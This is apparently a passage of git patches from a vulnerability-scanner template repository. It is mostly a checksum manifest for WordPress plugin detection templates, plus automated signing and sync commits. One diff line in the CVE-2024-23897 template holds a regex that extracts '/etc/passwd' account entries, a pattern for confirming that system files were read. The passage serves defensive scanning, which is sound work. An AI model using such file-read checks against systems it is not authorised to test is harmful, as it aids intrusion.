+http/technologies/wordpress/plugins/jetpack.yaml:ae7dfc613c3bd51335d0581574515e52ced97516 +http/technologies/wordpress/plugins/kadence-blocks.yaml:e23889cd809d78e62483e9d2388189e6f3ac8f35 +http/technologies/wordpress/plugins/kirki.yaml:a00979e94c92d98148026d56afbc570d25e2a590 +http/technologies/wordpress/plugins/leadin.yaml:7b6507fcadaa4d7ee83824b5ca2482d92a823ac0 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:20dd7abb9d11b5834ff4ed02e14516404d0faeb4 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:c4a2289b6475b5baf46d6cd5dd06c383c49fdafd +http/technologies/wordpress/plugins/litespeed-cache.yaml:4426535019914ae489e5e21c323a39c4c572f2c6 +http/technologies/wordpress/plugins/loco-translate.yaml:0e901bfc3d5b3a6e30930f54f99a361d8feb0a91 +http/technologies/wordpress/plugins/loginizer.yaml:388ee09364edb458746e7d9e92fb885ccf3f1f31 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:93185f2fe404be81f84609729462d3f3b261f0c2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1787d70af64b7e2ac86f7373defe800131d7cd81 +http/technologies/wordpress/plugins/mailpoet.yaml:8f3532e3070d200218c7a9de7f0451241f810ba5 +http/technologies/wordpress/plugins/maintenance.yaml:7b2ec90decccf786b2dcd9455804a46b74165071 +http/technologies/wordpress/plugins/mainwp-child.yaml:e7b18b679c62caaec96fc734b54bad9427ebdaaf +http/technologies/wordpress/plugins/malcare-security.yaml:6e17906c9a4f2c3aed1ff7fb6ea6f237ce0431ee +http/technologies/wordpress/plugins/megamenu.yaml:19c8d9011038aaa48f467ca78ac5d8074e44d99d +http/technologies/wordpress/plugins/members.yaml:020759f3beb0df0032b048647d85e5d097301dd0 +http/technologies/wordpress/plugins/meta-box.yaml:8848566038b6401ce4d74f1ddbe7fa972906eb33 +http/technologies/wordpress/plugins/metform.yaml:b373e75914b27691d6ad6fbbf72208e05fb9143f +http/technologies/wordpress/plugins/ml-slider.yaml:d43954efca9d79b2df33530db7ec1fd97292799b +http/technologies/wordpress/plugins/newsletter.yaml:0beb4dbce45771c12a1538412b38ff0dfed1f00a +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a8a6970c35ac5a167d679cd6d8167be33112e34f +http/technologies/wordpress/plugins/nextgen-gallery.yaml:f0e8a3ae3cdb8cff17b37775cf02a7fa48bbb074 +http/technologies/wordpress/plugins/ninja-forms.yaml:dd2107dfaadffc033b3a4087b921305bcbb44bd7 +http/technologies/wordpress/plugins/ocean-extra.yaml:8fec86a2827e4526851154eaacb1492a947d5277 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:e82035a67ff351e66dd8e68b2e6683326e49f059 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:220297dcf79646594af0ea0029fafa700a5d3797 +http/technologies/wordpress/plugins/optinmonster.yaml:014f0a554b0685afd2ece0a024832d766e124a9a +http/technologies/wordpress/plugins/otter-blocks.yaml:31d6c8d3cf098174d7f2b572596970971abcfcd7 +http/technologies/wordpress/plugins/password-protected.yaml:beabc24efa52d4515130fee6b9a48ab26498a834 +http/technologies/wordpress/plugins/pdf-embedder.yaml:9f3e590a2f5c83383401c85cb0511aee7888f442 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:d48b8d80f0598feb9361875373bd47230e3f2aeb +http/technologies/wordpress/plugins/pixelyoursite.yaml:c69b9ccb366e71c28a5588e934c4c63db1ec1bbf +http/technologies/wordpress/plugins/polylang.yaml:30754775ac62eb131c63e98ac65e47ecece73ff8 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/popup-maker.yaml:460fab60cfb0249bcb4a8690892e9519a45d29ab +http/technologies/wordpress/plugins/post-smtp.yaml:31b44e1a0b1c9598a4c6f3ff7b64dcc9f94020e1 +http/technologies/wordpress/plugins/post-types-order.yaml:a76263093a49d00b239951dedb87d2983d83ea56 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:2e24660e1b4d9aeda2d9da70f361d4af9882ae93 +http/technologies/wordpress/plugins/pretty-link.yaml:5d8544745516f2f0458f13e234909d777861f5aa +http/technologies/wordpress/plugins/really-simple-captcha.yaml:53b4d681543b1048a408f6dd43a663c23dfa3f08 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:aeee6f3b354431e5580fc1bb40f8d4e8c13c6b97 +http/technologies/wordpress/plugins/redirection.yaml:13d3a797207525b0fa5e4e321f87da17e8b16032 +http/technologies/wordpress/plugins/redux-framework.yaml:049c3b75ebedca5181e6eb343d8e3d93917400e1 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:36d0e9b300d7d6d4494b174c16144944cab8ae6a +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:f57ca8da4c1a67395d62242d19ac6c7320c0b906 +http/technologies/wordpress/plugins/safe-svg.yaml:83bafa1656ce942789cbfae0ab2014ef96da85aa +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:daf00203a7e5a354d2f42375cfd1edd22febec0c +http/technologies/wordpress/plugins/sg-cachepress.yaml:73fc6c8a3d96a71d91fab1a13dc28120faabea98 +http/technologies/wordpress/plugins/sg-security.yaml:e792b82d7bc321071482788c084cbcedc6fe9040 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:10301c73c0537095042c120d66ef9ed3e1dc07ff +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:6ccf0a6c77515cb88be5663342b3dcb62dafa301 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:04ff62468af805f06152679c99793fe6870c8023 http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:29908a1c18a25319f66d4feba42cd0dbf5aaa1e0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:af6b21c53ac7bce137dc19ad792fcb4b4e201244 +http/technologies/wordpress/plugins/smart-slider-3.yaml:d36236aa3623be2e834972c1cabb27fb5f56035b +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:6022e7e6cbbd6bd4cdb19e76c22e77e1de0543f2 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:771151efeea9b53c529b5f917f1b02df41fe0e2b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:6bb2ccbdcb2ce23af12bee728f557359da021598 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:66a97450ea54a800f87db8b7082dba0df893428b http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:7b32d898aaea0c9908a4765c41d1473280fd651c +http/technologies/wordpress/plugins/tablepress.yaml:c2723b2de920a350d201ab774fe1751ab323f548 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:c11d35c694fd69a34d48037a4bb3bd8e6fe9857e +http/technologies/wordpress/plugins/templately.yaml:ade0d4ef0de4ee52b092ca6ccf552e802cc03d9e +http/technologies/wordpress/plugins/the-events-calendar.yaml:8a0b4005e5c6b1ede12c6a0a051a9c83d00ac798 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:b5d7053c887f0a7e838f5c1471c6ccd087c40acd +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:a187e259be2eeb2913a07e25246618d6a6c064c1 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:4ca1e11ca0c767a03628285421281969898e68e9 +http/technologies/wordpress/plugins/under-construction-page.yaml:b4948247ca93389fe46139edbc4dbf921d922d48 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:a7a21674d1d2d96cf05b764b97516bec421f6349 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:80ef97bd7dfd5b27c4bf7753c395cacfc3cfbf02 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:97cde635dba3f5dac59bcf8b07ec3cb4f25f964f +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:4d04d3a72874e95c326e912614f0d61af5700196 +http/technologies/wordpress/plugins/webp-express.yaml:08fbd3e6f747eca0ac990b184579f2896e6f8ad7 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:b7128ba299f6cf6163d561e68dc1331f8fe571b6 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:d6637a73c4ba6d540ef4f80a74f33552de0a7502 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:02ee4b3365959029e77b7ef8073e07217dbc6cc1 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:a9e82eb15ab0633fe2f6b2ac213caf96155f7497 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:221da0df01b0720dc4b0a9fe09bf72e0c11ba609 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:9f7efe4c2493ebd2879c8fdd4947febfe61b13a5 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:2f0cd090510ea716b24a8271ef51637db7463df9 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:f0939678bf870113c45a1242d32091f30d794c55 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:48dfeb1de94ba70923e3f54cfdaab5b8a1dc8fe1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:ef04e2c0f7ca3a95825a71b32a2a614e9212ff5f +http/technologies/wordpress/plugins/woocommerce.yaml:6e33a8ec49f4e851da42b185f2978fa11ab1bf0b +http/technologies/wordpress/plugins/wordfence.yaml:3cfee733fd55cae44fa04c7f501c039a8c3c3556 +http/technologies/wordpress/plugins/wordpress-importer.yaml:8be756aaf7d0e73ef24d28f4abb85f91627bed22 +http/technologies/wordpress/plugins/wordpress-seo.yaml:55afb2fe070bf5ebfb106df88554fff5dc5555f3 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:11fb19a66b1bd071fedb20c46ea3a808ae176b9d +http/technologies/wordpress/plugins/wp-crontrol.yaml:3714b65cedd83ea9e318af9904fb02e5b3f8e7d8 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:06cfd8d4fb943aec5e640d2dc877903627c4990a +http/technologies/wordpress/plugins/wp-file-manager.yaml:f1e344c60aa96013438a164f2f478a0cc8bc4afc +http/technologies/wordpress/plugins/wp-google-maps.yaml:12ea7554db4e2269e35def19d88f758e26f562d6 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:9c93b1f625cb51b145b0106c990bcc14c9d4ea1d +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:2252da283dbea2c8d5fb254db7a4030db619c0cf +http/technologies/wordpress/plugins/wp-migrate-db.yaml:e6942479c85b4f9c28b41b4973231a0bf1322fab +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0265f004beff84b5c6a4db99e7c504e79e907c9a +http/technologies/wordpress/plugins/wp-optimize.yaml:609310d79ffe730b1104ccc20117df56183f073e +http/technologies/wordpress/plugins/wp-pagenavi.yaml:4019b17fd7dc0ac43997c6b8d41a3fc06361aab9 +http/technologies/wordpress/plugins/wp-reset.yaml:da00753df734541203bcfa3d03f3eb479b079fc5 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:376a2c3e07ed0f0cc2838e3f525df6eaee5b08f9 +http/technologies/wordpress/plugins/wp-rollback.yaml:0f6fe29769659c8bd4f1180be5b65acbc4c57959 +http/technologies/wordpress/plugins/wp-seopress.yaml:34e80c3738c02480eb8ec534d195746bf49ebd91 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:7cd7ec9d42cf0bd115898711714c1a6cda1b9342 +http/technologies/wordpress/plugins/wp-smushit.yaml:54fb939b43ccbcde323c545e3ea38ca81c5ac17f +http/technologies/wordpress/plugins/wp-statistics.yaml:875c961789ad4bdcde0c64e060f89683bb4edd1f +http/technologies/wordpress/plugins/wp-super-cache.yaml:f061c80cc16b5678480718f5c6244df7b3317189 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:4458b78330c65d0e119720d5cee87cab8b303b9c +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:6abe6c23fcbaf9f8a86c5cf266e4b5b9cb4bcfa6 +http/technologies/wordpress/plugins/wpforms-lite.yaml:dceaf29120ddb768a62c4ec7e352fbc59f2a0973 +http/technologies/wordpress/plugins/wps-hide-login.yaml:7738c75e17dfa3a3cf2c17ad3e0672b139c6c7ac +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:5ab0ea54ff29c94f40363acfa78ab5b850f7cdc1 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:90ddf2a108a19542c890e685db648e604eac2c49 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8931,7 +8932,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:93255318eb46029030767059d20d0c752906f6c5 +templates-checksum.txt:15a26310b9e31c3634c678de98decab839645cd0 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 9b33c4c19bf9cdaec57838348f4ec7fa79d8f9f5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 29 Jul 2024 03:27:49 +0000 Subject: [PATCH 1704/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 33b20392fb..b159f3b07c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2023/CVE-2023-44393.yaml' + - 'http/cves/2024/CVE-2024-6205.yaml' - 'http/osint/user-enumeration/substack.yaml' workflow_dispatch: jobs: From 547146e91cb0845f87d3e00d5642e5255d7e3ebc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 29 Jul 2024 03:28:52 +0000 Subject: [PATCH 1705/1841] Auto Template Signing [Mon Jul 29 03:28:52 UTC 2024] :robot: --- http/cves/2024/CVE-2024-6205.yaml | 1 + javascript/cves/2024/CVE-2024-23897.yaml | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index 3af4486a2a..5f06659d06 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -41,3 +41,4 @@ http: - "regex('^-1$', body)" - 'contains(content_type,"text/html")' condition: and +# digest: 4a0a00473045022100f111a9b235cd1beced5bdee2a525448fa0cbe1fdd412e6aa9504086a610188160220594702f19ed51d04265a15c1a4fdb984964da0b4aa02ba183010395bdfac2c75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index f8a3df2704..f1170bd6c8 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -61,4 +61,5 @@ javascript: - type: regex group: 1 regex: - - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' \ No newline at end of file + - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' +# digest: 4a0a0047304502206eba6b4f22e63dce8b3a14dc3fd1c8e1f4ed2c1d694f3a79f5f112a0ba123d91022100ac31dce594c6bba387f54c74f0a16c4fd5f40566f793dd2aa1e90851a8d69a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d1f5b94e78b2c09fc19d48b483e07733b6f43622 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 29 Jul 2024 09:12:23 +0530 Subject: [PATCH 1706/1841] Create deployment-interface-exposed.yaml --- .../deployment-interface-exposed.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/deployment-interface-exposed.yaml diff --git a/http/misconfiguration/deployment-interface-exposed.yaml b/http/misconfiguration/deployment-interface-exposed.yaml new file mode 100644 index 0000000000..7442c46ba0 --- /dev/null +++ 